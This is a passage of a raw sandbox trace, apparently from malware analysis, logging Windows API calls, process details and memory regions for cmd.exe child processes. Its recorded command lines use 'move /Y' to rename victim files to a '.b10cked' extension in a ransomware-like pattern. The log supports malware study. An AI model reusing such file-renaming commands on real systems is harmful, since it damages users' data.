lpcbData=0x1ce8c0*=0x1000 | out: lpType=0x1ce8c4*=0x0, lpData=0x1ce8c8*=0x40, lpcbData=0x1ce8c0*=0x1000) returned 0x2 [0195.928] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ce8c4, lpData=0x1ce8c8, lpcbData=0x1ce8c0*=0x1000 | out: lpType=0x1ce8c4*=0x4, lpData=0x1ce8c8*=0x1, lpcbData=0x1ce8c0*=0x4) returned 0x0 [0195.928] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ce8c4, lpData=0x1ce8c8, lpcbData=0x1ce8c0*=0x1000 | out: lpType=0x1ce8c4*=0x0, lpData=0x1ce8c8*=0x1, lpcbData=0x1ce8c0*=0x1000) returned 0x2 [0195.928] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ce8c4, lpData=0x1ce8c8, lpcbData=0x1ce8c0*=0x1000 | out: lpType=0x1ce8c4*=0x4, lpData=0x1ce8c8*=0x0, lpcbData=0x1ce8c0*=0x4) returned 0x0 [0195.928] 
RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ce8c4, lpData=0x1ce8c8, lpcbData=0x1ce8c0*=0x1000 | out: lpType=0x1ce8c4*=0x4, lpData=0x1ce8c8*=0x9, lpcbData=0x1ce8c0*=0x4) returned 0x0 [0195.928] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ce8c4, lpData=0x1ce8c8, lpcbData=0x1ce8c0*=0x1000 | out: lpType=0x1ce8c4*=0x4, lpData=0x1ce8c8*=0x9, lpcbData=0x1ce8c0*=0x4) returned 0x0 [0195.928] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ce8c4, lpData=0x1ce8c8, lpcbData=0x1ce8c0*=0x1000 | out: lpType=0x1ce8c4*=0x0, lpData=0x1ce8c8*=0x9, lpcbData=0x1ce8c0*=0x1000) returned 0x2 [0195.928] RegCloseKey (hKey=0x40) returned 0x0 [0195.928] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88639d [0195.928] srand (_Seed=0x5b88639d) [0195.928] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXW\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\Hx_1033_MKWD_K.HxW.b10cked\"" [0195.929] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXW\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\Hx_1033_MKWD_K.HxW.b10cked\"" [0195.929] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0195.929] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3d18d8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0195.929] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0195.929] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 
[0195.929] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0195.929] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0195.929] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0195.929] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0195.929] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0195.929] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0195.929] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0195.929] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0195.929] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0195.929] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0195.929] GetEnvironmentStringsW () returned 0x3d22c8* [0195.930] FreeEnvironmentStringsW (penv=0x3d22c8) returned 1 [0195.930] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0195.930] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0195.930] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0195.930] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0195.930] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0195.930] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0195.930] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0195.930] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0195.930] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0195.930] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0195.930] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1cf688 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0195.930] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, 
lpBuffer=0x1cf688, lpFilePart=0x1cf684 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1cf684*="Desktop") returned 0x18 [0195.930] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0195.930] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1cf404 | out: lpFindFileData=0x1cf404) returned 0x3d0008 [0195.930] FindClose (in: hFindFile=0x3d0008 | out: hFindFile=0x3d0008) returned 1 [0195.930] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1cf404 | out: lpFindFileData=0x1cf404) returned 0x3d0008 [0195.930] FindClose (in: hFindFile=0x3d0008 | out: hFindFile=0x3d0008) returned 1 [0195.930] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1cf404 | out: lpFindFileData=0x1cf404) returned 0x3d0008 [0195.930] FindClose (in: hFindFile=0x3d0008 | out: hFindFile=0x3d0008) returned 1 [0195.931] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0195.931] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0195.931] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0195.931] GetEnvironmentStringsW () returned 0x3d2ae8* [0195.931] FreeEnvironmentStringsW (penv=0x3d2ae8) returned 1 [0195.931] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0195.931] GetConsoleOutputCP () returned 0x1b5 [0195.931] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0195.931] GetUserDefaultLCID () returned 0x409 [0195.932] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0195.932] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1cf7c8, cchData=128 | out: lpLCData="0") returned 2 [0195.932] 
GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1cf7c8, cchData=128 | out: lpLCData="0") returned 2 [0195.932] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1cf7c8, cchData=128 | out: lpLCData="1") returned 2 [0195.932] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0195.932] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0195.932] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0195.932] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0195.932] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0195.932] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0195.932] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0195.932] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0195.932] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0195.932] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0195.932] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0195.933] GetConsoleTitleW (in: lpConsoleTitle=0x3c08d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0195.934] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0195.934] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0195.934] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0195.934] GetProcAddress 
(hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0195.935] _wcsicmp (_String1="move", _String2=")") returned 68 [0195.935] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0195.935] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0195.935] _wcsicmp (_String1="IF", _String2="move") returned -4 [0195.935] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0195.935] _wcsicmp (_String1="REM", _String2="move") returned 5 [0195.935] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0195.938] GetConsoleTitleW (in: lpConsoleTitle=0x1cf4c0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0195.938] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0195.938] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0195.938] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0195.938] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0195.938] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0195.938] _wcsicmp (_String1="move", _String2="CD") returned 10 [0195.938] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0195.938] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0195.938] _wcsicmp (_String1="move", _String2="REN") returned -5 [0195.938] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0195.938] _wcsicmp (_String1="move", _String2="SET") returned -6 [0195.938] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0195.938] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0195.938] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0195.938] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0195.938] _wcsicmp (_String1="move", _String2="MD") returned 11 [0195.938] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0195.938] _wcsicmp (_String1="move", _String2="RD") returned -5 [0195.938] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0195.938] _wcsicmp (_String1="move", 
_String2="PATH") returned -3 [0195.938] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0195.938] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0195.938] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0195.938] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0195.938] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0195.938] _wcsicmp (_String1="move", _String2="VER") returned -9 [0195.938] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0195.938] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0195.938] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0195.938] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0195.938] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0195.938] _wcsicmp (_String1="move", _String2="START") returned -6 [0195.939] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0195.939] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0195.939] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0195.940] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0195.940] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0195.940] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1cf27c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x1cf274, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1cf274*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0195.940] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0195.940] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0195.940] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0195.940] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0195.940] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", 
_MaxCount=0x7) returned 3 [0195.940] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0195.940] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0195.940] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0195.940] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0195.940] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0195.940] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0195.940] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0195.940] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0195.941] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0195.941] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0195.941] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0195.941] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0195.941] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0195.941] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0195.941] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0195.941] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0195.941] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0195.941] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0195.941] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0195.941] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0195.941] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0195.941] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 
[0195.941] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0195.941] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0195.941] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0195.941] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0195.941] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0195.941] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0195.941] _wcsicmp (_String1="HX_103~1.HXW", _String2=".") returned 58 [0195.941] _wcsicmp (_String1="HX_103~1.HXW", _String2="..") returned 58 [0195.941] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXW" (normalized: "c:\\users\\alluse~1\\micros~2\\hx_103~1.hxw")) returned 0x2022 [0195.942] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3d1e30 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0195.942] SetErrorMode (uMode=0x0) returned 0x0 [0195.942] SetErrorMode (uMode=0x1) returned 0x0 [0195.942] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXW", nBufferLength=0x104, lpBuffer=0x1cec04, lpFilePart=0x1cebec | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXW", lpFilePart=0x1cebec*="HX_103~1.HXW") returned 0x27 [0195.942] SetErrorMode (uMode=0x0) returned 0x1 [0195.942] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2" (normalized: "c:\\users\\alluse~1\\micros~2")) returned 0x2012 [0195.942] _wcsicmp (_String1="HX_103~1.HXW", _String2=".") returned 58 [0195.942] _wcsicmp (_String1="HX_103~1.HXW", _String2="..") returned 58 [0195.942] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXW" (normalized: "c:\\users\\alluse~1\\micros~2\\hx_103~1.hxw")) returned 0x2022 [0195.942] SetErrorMode (uMode=0x0) returned 0x0 [0195.942] SetErrorMode (uMode=0x1) returned 0x0 [0195.942] GetFullPathNameW (in: 
lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXW", nBufferLength=0x104, lpBuffer=0x1cf080, lpFilePart=0x1cee18 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXW", lpFilePart=0x1cee18*="HX_103~1.HXW") returned 0x27 [0195.942] SetErrorMode (uMode=0x0) returned 0x1 [0195.942] SetErrorMode (uMode=0x0) returned 0x0 [0195.942] SetErrorMode (uMode=0x1) returned 0x0 [0195.942] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\Hx_1033_MKWD_K.HxW.b10cked", nBufferLength=0x104, lpBuffer=0x1cf288, lpFilePart=0x1cee18 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\Hx_1033_MKWD_K.HxW.b10cked", lpFilePart=0x1cee18*="Hx_1033_MKWD_K.HxW.b10cked") returned 0x35 [0195.942] SetErrorMode (uMode=0x0) returned 0x1 [0195.942] SetLastError (dwErrCode=0x0) [0195.942] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\Hx_1033_MKWD_K.HxW.b10cked" (normalized: "c:\\users\\alluse~1\\micros~2\\hx_1033_mkwd_k.hxw.b10cked")) returned 0xffffffff [0195.942] GetLastError () returned 0x2 [0195.942] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXW", fInfoLevelId=0x1, lpFindFileData=0x1ce794, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ce794) returned 0x3c0e50 [0195.943] FindNextFileW (in: hFindFile=0x3c0e50, lpFindFileData=0x1ce794 | out: lpFindFileData=0x1ce794) returned 0 [0195.943] FindClose (in: hFindFile=0x3c0e50 | out: hFindFile=0x3c0e50) returned 1 [0195.943] GetLastError () returned 0x12 [0195.943] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXW", fInfoLevelId=0x1, lpFindFileData=0x1ce794, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ce794) returned 0x3c0e50 [0195.943] FindNextFileW (in: hFindFile=0x3c0e50, lpFindFileData=0x1ce794 | out: lpFindFileData=0x1ce794) returned 0 [0195.943] FindClose (in: hFindFile=0x3c0e50 | out: hFindFile=0x3c0e50) returned 1 [0195.944] GetLastError () returned 0x12 [0195.944] 
FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXW", fInfoLevelId=0x1, lpFindFileData=0x3d1bd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3d1bd0) returned 0x3c0e50 [0195.944] FindNextFileW (in: hFindFile=0x3c0e50, lpFindFileData=0x3d1bd0 | out: lpFindFileData=0x3d1bd0) returned 0 [0195.944] FindClose (in: hFindFile=0x3c0e50 | out: hFindFile=0x3c0e50) returned 1 [0195.944] GetLastError () returned 0x12 [0195.944] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXW", fInfoLevelId=0x1, lpFindFileData=0x3d1bd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3d1bd0) returned 0x3c0e50 [0195.945] FindNextFileW (in: hFindFile=0x3c0e50, lpFindFileData=0x3d1bd0 | out: lpFindFileData=0x3d1bd0) returned 0 [0195.945] FindClose (in: hFindFile=0x3c0e50 | out: hFindFile=0x3c0e50) returned 1 [0195.945] GetLastError () returned 0x12 [0195.945] _get_osfhandle (_FileHandle=2) returned 0xb [0195.945] GetFileType (hFile=0xb) returned 0x2 [0196.122] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0196.122] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1ce964 | out: lpMode=0x1ce964) returned 1 [0196.123] _get_osfhandle (_FileHandle=2) returned 0xb [0196.123] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x1ce998 | out: lpConsoleScreenBufferInfo=0x1ce998) returned 1 [0196.123] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0196.124] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x1ce9d8 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0196.124] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2c, 
lpNumberOfCharsWritten=0x1ce9bc, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1ce9bc*=0x2c) returned 1 [0196.124] longjmp () [0196.124] _get_osfhandle (_FileHandle=1) returned 0x7 [0196.124] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0196.124] _get_osfhandle (_FileHandle=1) returned 0x7 [0196.124] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0196.124] _get_osfhandle (_FileHandle=0) returned 0x3 [0196.124] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0196.125] SetConsoleInputExeNameW () returned 0x1 [0196.125] GetConsoleOutputCP () returned 0x1b5 [0196.125] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0196.125] SetThreadUILanguage (LangId=0x0) returned 0x409 [0196.125] exit (_Code=1) Process: id = "452" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16920" os_pid = "0x53c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~2.HXW\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\Hx_1033_MKWD_NamedURL.HxW.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 28866 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 28867 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 28868 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 28869 start_va = 0x150000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 28870 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 28871 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 28872 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 28873 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 28874 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 28875 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 28903 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 28904 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 28905 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = 
"\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 28906 start_va = 0x2e0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 28907 start_va = 0x4e0000 end_va = 0x4effff entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 28908 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 28909 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 28910 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 28911 start_va 